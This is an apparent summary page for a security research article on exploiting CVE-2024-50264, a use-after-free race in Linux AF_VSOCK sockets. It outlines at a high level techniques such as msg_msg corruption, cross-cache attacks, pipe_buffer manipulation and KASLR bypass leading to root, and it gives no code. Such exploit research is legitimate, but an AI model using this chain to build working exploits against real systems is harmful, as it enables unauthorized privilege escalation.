Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
7 days ago
- #Exploit Development
- #CVE-2024-50264
- #Linux Kernel
- CVE-2024-50264 is a race condition in AF_VSOCK sockets in the Linux kernel, leading to a use-after-free (UAF) vulnerability.
- The vulnerability was introduced in Linux v4.8 and allows an unprivileged user to trigger the bug without user namespaces.
- Exploiting CVE-2024-50264 is challenging due to multiple limitations, including unstable race conditions and quick UAF writes.
- The article introduces kernel-hack-drill, a project for testing Linux kernel exploit primitives, which helped in developing the exploit.
- A novel technique for corrupting msg_msg objects is presented, allowing out-of-bounds kernel memory reads without infoleaks.
- The exploit strategy involves cross-cache attacks, Dirty Pipe techniques, and overcoming physical KASLR to achieve privilege escalation.
- The final exploit combines UAF writes with pipe_buffer manipulation to overwrite process credentials and gain root access.